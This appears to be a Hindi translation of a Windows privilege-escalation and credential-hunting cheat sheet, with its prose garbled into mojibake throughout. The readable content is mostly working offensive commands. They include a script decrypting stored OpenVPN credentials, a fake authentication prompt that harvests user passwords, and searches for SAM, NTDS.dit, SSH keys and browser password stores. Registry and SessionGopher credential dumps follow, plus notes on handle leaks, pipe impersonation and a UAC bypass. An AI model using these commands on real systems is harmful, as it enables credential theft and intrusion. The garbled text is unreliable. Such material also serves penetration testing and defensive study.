рдХреНрд░реИрдХрдореИрдкрдПрдХреНрд╕реЗрдХ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдкрд╛рд╕рд╡рд░реНрдб рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛:

crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin

IIS рд╡реЗрдм рдХреЙрдиреНрдлрд╝рд┐рдЧ

Get-Childitem тАУPath C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
Get-Childitem тАУPath C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem тАУPath C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

рд╡реЗрдм.config рдХрд╛ рдЙрджрд╛рд╣рд░рдг рдЬрд┐рд╕рдореЗрдВ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рд╣реИрдВ:

<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user name="Administrator" password="SuperAdminPassword" />
</credentials>
</forms>
</authentication>

OpenVPN рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕

Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}

foreach ($item in $items)
{
$encryptedbytes=$item.'auth-data'
$entropy=$item.'entropy'
$entropy=$entropy[0..(($entropy.Length)-2)]

$decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encryptedBytes,
$entropy,
[System.Security.Cryptography.DataProtectionScope]::CurrentUser)

Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}

рд▓реЙрдЧреНрд╕

# IIS
C:\inetpub\logs\LogFiles\*

#Apache
Get-Childitem тАУPath C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue

Ask for credentials

You can always ask the user to enter his credentials of even the credentials of a different user if you think he can know them (notice that asking the client directly for the credentials is really рд░рд┐рд╕реНрдХреА):

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password

#Get plaintext
$cred.GetNetworkCredential() | fl

рд╕рдВрднрд╛рд╡рд┐рдд рдлрд╝рд╛рдЗрд▓ рдирд╛рдо рдЬрд┐рдирдореЗрдВ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рд╣реЛ рд╕рдХрддреЗ рд╣реИрдВ

рдЬрд╛рдиреЗ-рдорд╛рдиреЗ рдлрд╝рд╛рдЗрд▓реЗрдВ рдЬреЛ рдХреБрдЫ рд╕рдордп рдкрд╣рд▓реЗ рд╕реНрдкрд╖реНрдЯ-рдЯреЗрдХреНрд╕реНрдЯ рдпрд╛ Base64 рдореЗрдВ рдкрд╛рд╕рд╡рд░реНрдб рд░рдЦрддреА рдереАрдВ

$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db         #Firefox
key4.db         #Firefox
places.sqlite   #Firefox
"Login Data"    #Chrome
Cookies         #Chrome
Bookmarks       #Chrome
History         #Chrome
TypedURLsTime   #IE
TypedURLs       #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat

рд╕рднреА рдкреНрд░рд╕реНрддрд╛рд╡рд┐рдд рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреА рдЦреЛрдЬ рдХрд░реЗрдВ:

cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"
Get-Childitem тАУPath C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}

Credentials in the RecycleBin

рдЖрдкрдХреЛ рдмрд┐рди рдХреА рдЬрд╛рдВрдЪ рдХрд░рдиреА рдЪрд╛рд╣рд┐рдП рддрд╛рдХрд┐ рдЙрд╕рдореЗрдВ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреА рддрд▓рд╛рд╢ рдХреА рдЬрд╛ рд╕рдХреЗред

To recover passwords saved by several programs you can use: http://www.nirsoft.net/password_recovery_tools.html

Inside the registry

Other possible registry keys with credentials

reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"

Registry рд╕реЗ openssh рдХреБрдВрдЬреА рдирд┐рдХрд╛рд▓реЗрдВред

рдмреНрд░рд╛рдЙрдЬрд╝рд░реНрд╕ рдЗрддрд┐рд╣рд╛рд╕

рдЖрдкрдХреЛ рдЙрди dbs рдХреА рдЬрд╛рдВрдЪ рдХрд░рдиреА рдЪрд╛рд╣рд┐рдП рдЬрд╣рд╛рдБ Chrome рдпрд╛ Firefox рд╕реЗ рдкрд╛рд╕рд╡рд░реНрдб рд╕рдВрдЧреНрд░рд╣реАрдд рд╣реИрдВред
рдмреНрд░рд╛рдЙрдЬрд╝рд░реЛрдВ рдХреЗ рдЗрддрд┐рд╣рд╛рд╕, рдмреБрдХрдорд╛рд░реНрдХ рдФрд░ рдкрд╕рдВрджреАрджрд╛ рдХреА рднреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВ рддрд╛рдХрд┐ рд╢рд╛рдпрдж рдХреБрдЫ рдкрд╛рд╕рд╡рд░реНрдб рд╡рд╣рд╛рдБ рд╕рдВрдЧреНрд░рд╣реАрдд рд╣реЛрдВред

рдмреНрд░рд╛рдЙрдЬрд╝рд░реЛрдВ рд╕реЗ рдкрд╛рд╕рд╡рд░реНрдб рдирд┐рдХрд╛рд▓рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдХрд░рдг:

COM DLL рдУрд╡рд░рд░рд╛рдЗрдЯрд┐рдВрдЧ

рдХрдВрдкреЛрдиреЗрдВрдЯ рдСрдмреНрдЬреЗрдХреНрдЯ рдореЙрдбрд▓ (COM) рдПрдХ рддрдХрдиреАрдХ рд╣реИ рдЬреЛ Windows рдСрдкрд░реЗрдЯрд┐рдВрдЧ рд╕рд┐рд╕реНрдЯрдо рдХреЗ рднреАрддрд░ рдмрдирд╛рдИ рдЧрдИ рд╣реИ рдЬреЛ рд╡рд┐рднрд┐рдиреНрди рднрд╛рд╖рд╛рдУрдВ рдХреЗ рд╕реЙрдлрд╝реНрдЯрд╡реЗрдпрд░ рдШрдЯрдХреЛрдВ рдХреЗ рдмреАрдЪ рдЖрдкрд╕реА рд╕рдВрдЪрд╛рд░ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИред рдкреНрд░рддреНрдпреЗрдХ COM рдШрдЯрдХ рдХреЛ рдХреНрд▓рд╛рд╕ рдЖрдИрдбреА (CLSID) рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдкрд╣рдЪрд╛рди рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рдФрд░ рдкреНрд░рддреНрдпреЗрдХ рдШрдЯрдХ рдПрдХ рдпрд╛ рдПрдХ рд╕реЗ рдЕрдзрд┐рдХ рдЗрдВрдЯрд░рдлреЗрд╕ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛ рдХреЛ рдЙрдЬрд╛рдЧрд░ рдХрд░рддрд╛ рд╣реИ, рдЬрд┐рд╕реЗ рдЗрдВрдЯрд░рдлреЗрд╕ рдЖрдИрдбреА (IIDs) рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдкрд╣рдЪрд╛рдирд╛ рдЬрд╛рддрд╛ рд╣реИред

COM рд╡рд░реНрдЧ рдФрд░ рдЗрдВрдЯрд░рдлреЗрд╕ рдХреЛ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдореЗрдВ HKEY_CLASSES_ROOT\CLSID рдФрд░ HKEY_CLASSES_ROOT\Interface рдХреЗ рддрд╣рдд рдкрд░рд┐рднрд╛рд╖рд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред рдпрд╣ рд░рдЬрд┐рд╕реНрдЯреНрд░реА HKEY_LOCAL_MACHINE\Software\Classes + HKEY_CURRENT_USER\Software\Classes = HKEY_CLASSES_ROOT рдХреЛ рдорд┐рд▓рд╛рдХрд░ рдмрдирд╛рдИ рдЧрдИ рд╣реИред

рдЗрд╕ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреЗ CLSIDs рдХреЗ рдЕрдВрджрд░ рдЖрдк рдмрдЪреНрдЪреЗ рдХреА рд░рдЬрд┐рд╕реНрдЯреНрд░реА InProcServer32 рдкрд╛ рд╕рдХрддреЗ рд╣реИрдВ рдЬрд┐рд╕рдореЗрдВ рдПрдХ рдбрд┐рдлрд╝реЙрд▓реНрдЯ рдорд╛рди рд╣реЛрддрд╛ рд╣реИ рдЬреЛ рдПрдХ DLL рдХреА рдУрд░ рдЗрд╢рд╛рд░рд╛ рдХрд░рддрд╛ рд╣реИ рдФрд░ рдПрдХ рдорд╛рди рдЬрд┐рд╕реЗ ThreadingModel рдХрд╣рд╛ рдЬрд╛рддрд╛ рд╣реИ рдЬреЛ Apartment (рд╕рд┐рдВрдЧрд▓-рдереНрд░реЗрдбреЗрдб), Free (рдорд▓реНрдЯреА-рдереНрд░реЗрдбреЗрдб), Both (рд╕рд┐рдВрдЧрд▓ рдпрд╛ рдорд▓реНрдЯреА) рдпрд╛ Neutral (рдереНрд░реЗрдб рдиреНрдпреВрдЯреНрд░рд▓) рд╣реЛ рд╕рдХрддрд╛ рд╣реИред

рдмреБрдирд┐рдпрд╛рджреА рд░реВрдк рд╕реЗ, рдпрджрд┐ рдЖрдк рдХрд┐рд╕реА рднреА DLL рдХреЛ рдУрд╡рд░рд░рд╛рдЗрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдЬреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рд╣реЛрдиреЗ рдЬрд╛ рд░рд╣реА рд╣реИ, рддреЛ рдЖрдк рдЕрдзрд┐рдХрд╛рд░ рдмрдврд╝рд╛ рд╕рдХрддреЗ рд╣реИрдВ рдпрджрд┐ рд╡рд╣ DLL рдХрд┐рд╕реА рдЕрдиреНрдп рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рджреНрд╡рд╛рд░рд╛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рд╣реЛрдиреЗ рдЬрд╛ рд░рд╣реА рд╣реИред

рд╣рдорд▓рд╛рд╡рд░реЛрдВ рджреНрд╡рд╛рд░рд╛ COM Hijacking рдХрд╛ рдЙрдкрдпреЛрдЧ рд╕реНрдерд┐рд░рддрд╛ рддрдВрддреНрд░ рдХреЗ рд░реВрдк рдореЗрдВ рдХреИрд╕реЗ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдпрд╣ рдЬрд╛рдирдиреЗ рдХреЗ рд▓рд┐рдП рдЬрд╛рдВрдЪреЗрдВ:

{% content-ref url="com-hijacking.md" %} com-hijacking.md {% endcontent-ref %}

рдлрд╛рдЗрд▓реЛрдВ рдФрд░ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдореЗрдВ рд╕рд╛рдорд╛рдиреНрдп рдкрд╛рд╕рд╡рд░реНрдб рдЦреЛрдЬреЗрдВ

рдлрд╛рдЗрд▓ рд╕рд╛рдордЧреНрд░реА рдХреЗ рд▓рд┐рдП рдЦреЛрдЬреЗрдВ

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*

рдПрдХ рдирд┐рд╢реНрдЪрд┐рдд рдлрд╝рд╛рдЗрд▓ рдирд╛рдо рдХреЗ рд╕рд╛рде рдлрд╝рд╛рдЗрд▓ рдЦреЛрдЬреЗрдВ

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini

рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдореЗрдВ рдХреБрдВрдЬреА рдирд╛рдореЛрдВ рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рдХреЗ рд▓рд┐рдП рдЦреЛрдЬреЗрдВ

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d

Tools that search for passwords

MSF-Credentials Plugin рдПрдХ msf рдкреНрд▓рдЧрдЗрди рд╣реИ рдЬрд┐рд╕реЗ рдореИрдВрдиреЗ рд╢рд┐рдХрд╛рд░ рдХреЗ рдЕрдВрджрд░ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреА рдЦреЛрдЬ рдХрд░рдиреЗ рд╡рд╛рд▓реЗ рд╣рд░ рдореЗрдЯрд╛рд╕реНрдкреНрд▓реЙрдЗрдЯ POST рдореЙрдбреНрдпреВрд▓ рдХреЛ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдмрдирд╛рдпрд╛ рд╣реИред
Winpeas рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рдЗрд╕ рдкреГрд╖реНрда рдореЗрдВ рдЙрд▓реНрд▓рд┐рдЦрд┐рдд рдкрд╛рд╕рд╡рд░реНрдб рд╡рд╛рд▓реЗ рд╕рднреА рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреА рдЦреЛрдЬ рдХрд░рддрд╛ рд╣реИред
Lazagne рдПрдХ рдФрд░ рд╢рд╛рдирджрд╛рд░ рдЙрдкрдХрд░рдг рд╣реИ рдЬреЛ рдПрдХ рд╕рд┐рд╕реНрдЯрдо рд╕реЗ рдкрд╛рд╕рд╡рд░реНрдб рдирд┐рдХрд╛рд▓рдиреЗ рдХреЗ рд▓рд┐рдП рд╣реИред

рдЙрдкрдХрд░рдг SessionGopher рд╕рддреНрд░реЛрдВ, рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдореЛрдВ рдФрд░ рдкрд╛рд╕рд╡рд░реНрдбреЛрдВ рдХреА рдЦреЛрдЬ рдХрд░рддрд╛ рд╣реИ рдХрдИ рдЙрдкрдХрд░рдгреЛрдВ рдХреЗ рдЬреЛ рдЗрд╕ рдбреЗрдЯрд╛ рдХреЛ рд╕реНрдкрд╖реНрдЯ рдкрд╛рда рдореЗрдВ рд╕рд╣реЗрдЬрддреЗ рд╣реИрдВ (PuTTY, WinSCP, FileZilla, SuperPuTTY, рдФрд░ RDP)

Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss

Leaked Handlers

рдХрд▓реНрдкрдирд╛ рдХрд░реЗрдВ рдХрд┐ рдПрдХ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдЬреЛ SYSTEM рдХреЗ рд░реВрдк рдореЗрдВ рдЪрд▓ рд░рд╣реА рд╣реИ рдПрдХ рдирдИ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдЦреЛрд▓рддреА рд╣реИ (OpenProcess()) рдкреВрд░реНрдг рдкрд╣реБрдВрдЪ рдХреЗ рд╕рд╛рдеред рд╡рд╣реА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдПрдХ рдирдИ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рднреА рдмрдирд╛рддреА рд╣реИ (CreateProcess()) рдХрдо рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдХреЗ рд╕рд╛рде рд▓реЗрдХрд┐рди рдореБрдЦреНрдп рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗ рд╕рднреА рдЦреБрд▓реЗ рд╣реИрдВрдбрд▓ рд╡рд┐рд░рд╛рд╕рдд рдореЗрдВ рд▓реЗрддреЗ рд╣реБрдПред
рдлрд┐рд░, рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдХрдо рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡рд╛рд▓реА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рддрдХ рдкреВрд░реНрдг рдкрд╣реБрдВрдЪ рд╣реИ, рддреЛ рдЖрдк privileged рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗ рд▓рд┐рдП рдЦреБрд▓рд╛ рд╣реИрдВрдбрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдЬреЛ OpenProcess() рдХреЗ рд╕рд╛рде рдмрдирд╛рдИ рдЧрдИ рдереА рдФрд░ shellcode рдХреЛ рдЗрдВрдЬреЗрдХреНрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
рдЗрд╕ рдЙрджрд╛рд╣рд░рдг рдХреЛ рдкрдврд╝реЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд▓рд┐рдП рдЗрд╕ рднреЗрджреНрдпрддрд╛ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдФрд░ рд╢реЛрд╖рдг рдХрд░рдиреЗ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВред
рдЗрд╕ рдЕрдиреНрдп рдкреЛрд╕реНрдЯ рдХреЛ рдкрдврд╝реЗрдВ рдЕрдзрд┐рдХ рдкреВрд░реНрдг рд╡реНрдпрд╛рдЦреНрдпрд╛ рдХреЗ рд▓рд┐рдП рдХрд┐ рдХреИрд╕реЗ рд╡рд┐рднрд┐рдиреНрди рд╕реНрддрд░реЛрдВ рдХреЗ рдЕрдиреБрдорддрд┐рдпреЛрдВ (рдХреЗрд╡рд▓ рдкреВрд░реНрдг рдкрд╣реБрдВрдЪ рдирд╣реАрдВ) рдХреЗ рд╕рд╛рде рд╡рд┐рд░рд╛рд╕рдд рдореЗрдВ рдорд┐рд▓реА рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдФрд░ рдереНрд░реЗрдбреНрд╕ рдХреЗ рдЕрдзрд┐рдХ рдЦреБрд▓реЗ рд╣реИрдВрдбрд▓ рдХрд╛ рдкрд░реАрдХреНрд╖рдг рдФрд░ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░реЗрдВ.

Named Pipe Client Impersonation

рд╕рд╛рдЭрд╛ рдореЗрдореЛрд░реА рдЦрдВрдб, рдЬрд┐рд╕реЗ pipes рдХрд╣рд╛ рдЬрд╛рддрд╛ рд╣реИ, рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕рдВрдЪрд╛рд░ рдФрд░ рдбреЗрдЯрд╛ рд╕реНрдерд╛рдирд╛рдВрддрд░рдг рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреЗ рд╣реИрдВред

Windows рдПрдХ рд╕реБрд╡рд┐рдзрд╛ рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИ рдЬрд┐рд╕реЗ Named Pipes рдХрд╣рд╛ рдЬрд╛рддрд╛ рд╣реИ, рдЬреЛ рдЕрд╕рдВрдмрдВрдзрд┐рдд рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреЛ рдбреЗрдЯрд╛ рд╕рд╛рдЭрд╛ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ, рдпрд╣рд╛рдВ рддрдХ рдХрд┐ рд╡рд┐рднрд┐рдиреНрди рдиреЗрдЯрд╡рд░реНрдХреЛрдВ рдкрд░ рднреАред рдпрд╣ рдПрдХ рдХреНрд▓рд╛рдЗрдВрдЯ/рд╕рд░реНрд╡рд░ рдЖрд░реНрдХрд┐рдЯреЗрдХреНрдЪрд░ рдХреЗ рд╕рдорд╛рди рд╣реИ, рдЬрд┐рд╕рдореЗрдВ рднреВрдорд┐рдХрд╛рдПрдБ named pipe server рдФрд░ named pipe client рдХреЗ рд░реВрдк рдореЗрдВ рдкрд░рд┐рднрд╛рд╖рд┐рдд рд╣реЛрддреА рд╣реИрдВред

рдЬрдм рдбреЗрдЯрд╛ рдПрдХ client рджреНрд╡рд╛рд░рд╛ рдПрдХ pipe рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рднреЗрдЬрд╛ рдЬрд╛рддрд╛ рд╣реИ, рддреЛ server рдЬрд┐рд╕рдиреЗ pipe рд╕реЗрдЯ рдХрд┐рдпрд╛ рд╣реИ, client рдХреА рдкрд╣рдЪрд╛рди рдЕрдкрдирд╛рдиреЗ рдХреА рдХреНрд╖рдорддрд╛ рд░рдЦрддрд╛ рд╣реИ, рдмрд╢рд░реНрддреЗ рдХрд┐ рдЙрд╕рдХреЗ рдкрд╛рд╕ рдЖрд╡рд╢реНрдпрдХ SeImpersonate рдЕрдзрд┐рдХрд╛рд░ рд╣реЛрдВред рдПрдХ privileged рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреА рдкрд╣рдЪрд╛рди рдХрд░рдирд╛ рдЬреЛ рдПрдХ pipe рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╕рдВрд╡рд╛рдж рдХрд░рддреА рд╣реИ рдЬрд┐рд╕реЗ рдЖрдк рдЕрдиреБрдХрд░рдг рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЖрдкрдХреЛ рдЙрдЪреНрдЪ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХрд╛ рдЕрд╡рд╕рд░ рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИ рдЬрдм рд╡рд╣ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдЙрд╕ pipe рдХреЗ рд╕рд╛рде рдмрд╛рддрдЪреАрдд рдХрд░рддреА рд╣реИ рдЬрд┐рд╕реЗ рдЖрдкрдиреЗ рд╕реНрдерд╛рдкрд┐рдд рдХрд┐рдпрд╛ рд╣реИред рдЗрд╕ рддрд░рд╣ рдХреЗ рд╣рдорд▓реЗ рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдирд┐рд░реНрджреЗрд╢реЛрдВ рдХреЗ рд▓рд┐рдП, рд╕рд╣рд╛рдпрдХ рдорд╛рд░реНрдЧрджрд░реНрд╢рд┐рдХрд╛рдПрдБ рдпрд╣рд╛рдБ рдФрд░ рдпрд╣рд╛рдБ рдкрд╛рдИ рдЬрд╛ рд╕рдХрддреА рд╣реИрдВред

рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдЙрдкрдХрд░рдг burp рдЬреИрд╕реЗ рдЙрдкрдХрд░рдг рдХреЗ рд╕рд╛рде рдПрдХ named pipe рд╕рдВрдЪрд╛рд░ рдХреЛ рдЗрдВрдЯрд░рд╕реЗрдкреНрдЯ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ: https://github.com/gabriel-sztejnworcel/pipe-intercept рдФрд░ рдпрд╣ рдЙрдкрдХрд░рдг рд╕рднреА pipes рдХреЛ рд╕реВрдЪреАрдмрджреНрдз рдХрд░рдиреЗ рдФрд░ privescs рдЦреЛрдЬрдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ https://github.com/cyberark/PipeViewer

Misc

Monitoring Command Lines for passwords

рдЬрдм рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд░реВрдк рдореЗрдВ рдПрдХ shell рдкреНрд░рд╛рдкреНрдд рдХрд░рддреЗ рд╣реИрдВ, рддреЛ рдХреБрдЫ рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд╛рд░реНрдп рдпрд╛ рдЕрдиреНрдп рдкреНрд░рдХреНрд░рд┐рдпрд╛рдПрдБ рдЪрд▓ рд░рд╣реА рд╣реЛ рд╕рдХрддреА рд╣реИрдВ рдЬреЛ рдХрдорд╛рдВрдб рд▓рд╛рдЗрди рдкрд░ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдкрд╛рд╕ рдХрд░рддреА рд╣реИрдВред рдиреАрдЪреЗ рджрд┐рдпрд╛ рдЧрдпрд╛ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд╣рд░ рджреЛ рд╕реЗрдХрдВрдб рдореЗрдВ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХрдорд╛рдВрдб рд▓рд╛рдЗрдиреЛрдВ рдХреЛ рдХреИрдкреНрдЪрд░ рдХрд░рддрд╛ рд╣реИ рдФрд░ рд╡рд░реНрддрдорд╛рди рд╕реНрдерд┐рддрд┐ рдХреА рддреБрд▓рдирд╛ рдкрд┐рдЫрд▓реЗ рд╕реНрдерд┐рддрд┐ рд╕реЗ рдХрд░рддрд╛ рд╣реИ, рдХрд┐рд╕реА рднреА рдЕрдВрддрд░ рдХреЛ рдЖрдЙрдЯрдкреБрдЯ рдХрд░рддрд╛ рд╣реИред

while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}

рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рд╕реЗ рдкрд╛рд╕рд╡рд░реНрдб рдЪреБрд░рд╛рдирд╛

рдХрдо рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕реЗ NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC рдмрд╛рдпрдкрд╛рд╕

рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдЧреНрд░рд╛рдлрд┐рдХрд▓ рдЗрдВрдЯрд░рдлреЗрд╕ (рдХрдВрд╕реЛрд▓ рдпрд╛ RDP рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ) рддрдХ рдкрд╣реБрдВрдЪ рд╣реИ рдФрд░ UAC рд╕рдХреНрд╖рдо рд╣реИ, рддреЛ Microsoft Windows рдХреЗ рдХреБрдЫ рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдореЗрдВ рдПрдХ рдЕрдирдзрд┐рдХреГрдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕реЗ "NT\AUTHORITY SYSTEM" рдЬреИрд╕реЗ рдХрд┐рд╕реА рднреА рдЕрдиреНрдп рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдпрд╛ рдЯрд░реНрдорд┐рдирд▓ рдХреЛ рдЪрд▓рд╛рдирд╛ рд╕рдВрднрд╡ рд╣реИред

